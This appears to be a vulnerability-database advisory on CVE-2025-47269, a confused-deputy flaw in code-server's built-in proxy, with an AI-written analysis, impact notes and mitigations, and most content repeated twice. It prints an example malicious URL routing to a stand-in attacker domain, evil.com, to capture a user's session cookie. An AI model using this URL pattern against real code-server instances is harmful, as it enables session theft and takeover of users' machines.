CVE-2025-47269: CWE-441: Unintended Proxy or Intermediary ('Confused Deputy') in coder code-server
code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4.
AI Analysis
Technical Summary
CVE-2025-47269 is a high-severity vulnerability affecting coder's code-server product prior to version 4.99.4. Code-server enables running Visual Studio Code on any machine with browser access, facilitating remote development environments. The vulnerability arises from improper validation of proxy subpath URLs used by the built-in proxy feature. Specifically, the proxy functionality is intended to forward requests to local ports, but due to insufficient validation of the port and domain in the proxy URL, an attacker can craft a malicious URL such as https://<code-server>/proxy/test@evil.com/path. This URL causes the proxy to forward the request to an arbitrary external domain controlled by the attacker instead of a local port. When a user clicks such a malicious link while authenticated to code-server, their session token (cookie) is sent to the attacker’s domain. With the stolen session token, the attacker can authenticate as the user on the code-server instance, gaining full access to the remote development environment and underlying machine with the user’s privileges. This is a classic example of a confused deputy vulnerability (CWE-441), where the proxy component is tricked into performing unauthorized actions on behalf of the attacker. The vulnerability requires user interaction (clicking a malicious link) but no prior authentication or elevated privileges are needed to exploit it. The CVSS 3.1 base score is 8.3 (high), reflecting network attack vector, low attack complexity, no privileges required, user interaction required, and high impact on confidentiality and integrity with limited availability impact. The issue has been patched in code-server version 4.99.4, but versions prior remain vulnerable. No known exploits in the wild have been reported yet. This vulnerability poses a significant risk to environments using code-server with the built-in proxy enabled, especially in scenarios where users may be targeted with phishing or social engineering attacks to click malicious URLs.
Potential Impact
For European organizations, this vulnerability could lead to unauthorized access to internal development environments and potentially sensitive source code or intellectual property hosted on code-server instances. Since code-server is used to provide remote VS Code access, attackers gaining session tokens can execute arbitrary code or commands with the privileges of the compromised user, potentially leading to lateral movement within corporate networks. Confidentiality is severely impacted as session tokens and sensitive data can be exfiltrated. Integrity is also at risk since attackers can modify code or configurations. Availability impact is lower but could occur if attackers disrupt development workflows or deploy malicious code. Organizations in Europe relying on code-server for remote development, especially in sectors like software development, finance, and critical infrastructure, face risks of intellectual property theft, sabotage, or compliance violations under GDPR if personal data is exposed. The requirement for user interaction means phishing defenses and user awareness are critical. The vulnerability also raises concerns for cloud-hosted or hybrid environments common in European enterprises, where code-server instances may be exposed externally or internally.
Mitigation Recommendations
1. Immediate upgrade of all code-server instances to version 4.99.4 or later, where the vulnerability is patched. 2. Disable the built-in proxy feature if not strictly necessary, reducing the attack surface. 3. Implement strict URL filtering and validation on any reverse proxies or web application firewalls (WAFs) in front of code-server to block suspicious /proxy/ URLs referencing external domains. 4. Educate users about the risks of clicking untrusted links, especially those referencing code-server URLs with /proxy subpaths. 5. Monitor code-server logs for unusual proxy requests or access patterns that could indicate exploitation attempts. 6. Employ network segmentation to limit code-server access to trusted networks and users only. 7. Use multi-factor authentication (MFA) for code-server access to reduce risk from stolen session tokens. 8. Regularly audit and rotate session tokens or cookies to limit the window of token reuse. 9. Consider deploying endpoint protection solutions capable of detecting anomalous code-server activity. These measures combined will reduce the likelihood and impact of exploitation beyond simply patching the vulnerability.
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Ireland, Belgium
CVE-2025-47269: CWE-441: Unintended Proxy or Intermediary ('Confused Deputy') in coder code-server
Description
code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4.
AI-Powered Analysis
Technical Analysis
CVE-2025-47269 is a high-severity vulnerability affecting coder's code-server product prior to version 4.99.4. Code-server enables running Visual Studio Code on any machine with browser access, facilitating remote development environments. The vulnerability arises from improper validation of proxy subpath URLs used by the built-in proxy feature. Specifically, the proxy functionality is intended to forward requests to local ports, but due to insufficient validation of the port and domain in the proxy URL, an attacker can craft a malicious URL such as https://<code-server>/proxy/test@evil.com/path. This URL causes the proxy to forward the request to an arbitrary external domain controlled by the attacker instead of a local port. When a user clicks such a malicious link while authenticated to code-server, their session token (cookie) is sent to the attacker’s domain. With the stolen session token, the attacker can authenticate as the user on the code-server instance, gaining full access to the remote development environment and underlying machine with the user’s privileges. This is a classic example of a confused deputy vulnerability (CWE-441), where the proxy component is tricked into performing unauthorized actions on behalf of the attacker. The vulnerability requires user interaction (clicking a malicious link) but no prior authentication or elevated privileges are needed to exploit it. The CVSS 3.1 base score is 8.3 (high), reflecting network attack vector, low attack complexity, no privileges required, user interaction required, and high impact on confidentiality and integrity with limited availability impact. The issue has been patched in code-server version 4.99.4, but versions prior remain vulnerable. No known exploits in the wild have been reported yet. This vulnerability poses a significant risk to environments using code-server with the built-in proxy enabled, especially in scenarios where users may be targeted with phishing or social engineering attacks to click malicious URLs.
Potential Impact
For European organizations, this vulnerability could lead to unauthorized access to internal development environments and potentially sensitive source code or intellectual property hosted on code-server instances. Since code-server is used to provide remote VS Code access, attackers gaining session tokens can execute arbitrary code or commands with the privileges of the compromised user, potentially leading to lateral movement within corporate networks. Confidentiality is severely impacted as session tokens and sensitive data can be exfiltrated. Integrity is also at risk since attackers can modify code or configurations. Availability impact is lower but could occur if attackers disrupt development workflows or deploy malicious code. Organizations in Europe relying on code-server for remote development, especially in sectors like software development, finance, and critical infrastructure, face risks of intellectual property theft, sabotage, or compliance violations under GDPR if personal data is exposed. The requirement for user interaction means phishing defenses and user awareness are critical. The vulnerability also raises concerns for cloud-hosted or hybrid environments common in European enterprises, where code-server instances may be exposed externally or internally.
Mitigation Recommendations
1. Immediate upgrade of all code-server instances to version 4.99.4 or later, where the vulnerability is patched. 2. Disable the built-in proxy feature if not strictly necessary, reducing the attack surface. 3. Implement strict URL filtering and validation on any reverse proxies or web application firewalls (WAFs) in front of code-server to block suspicious /proxy/ URLs referencing external domains. 4. Educate users about the risks of clicking untrusted links, especially those referencing code-server URLs with /proxy subpaths. 5. Monitor code-server logs for unusual proxy requests or access patterns that could indicate exploitation attempts. 6. Employ network segmentation to limit code-server access to trusted networks and users only. 7. Use multi-factor authentication (MFA) for code-server access to reduce risk from stolen session tokens. 8. Regularly audit and rotate session tokens or cookies to limit the window of token reuse. 9. Consider deploying endpoint protection solutions capable of detecting anomalous code-server activity. These measures combined will reduce the likelihood and impact of exploitation beyond simply patching the vulnerability.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- GitHub_M
- Date Reserved
- 2025-05-05T16:53:10.371Z
- Cisa Enriched
- true
- Cvss Version
- 3.1
- State
- PUBLISHED
Threat ID: 682d9817c4522896dcbd72de
Added to database: 5/21/2025, 9:08:39 AM
Last enriched: 7/4/2025, 11:26:55 PM
Last updated: 7/27/2025, 1:44:08 AM
Views: 14
Related Threats
CVE-2025-54205: Out-of-bounds Read (CWE-125) in Adobe Substance3D - Sampler
MediumCVE-2025-54195: Out-of-bounds Read (CWE-125) in Adobe Substance3D - Painter
MediumCVE-2025-54194: Out-of-bounds Read (CWE-125) in Adobe Substance3D - Painter
MediumCVE-2025-54193: Out-of-bounds Read (CWE-125) in Adobe Substance3D - Painter
MediumCVE-2025-54192: Out-of-bounds Read (CWE-125) in Adobe Substance3D - Painter
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.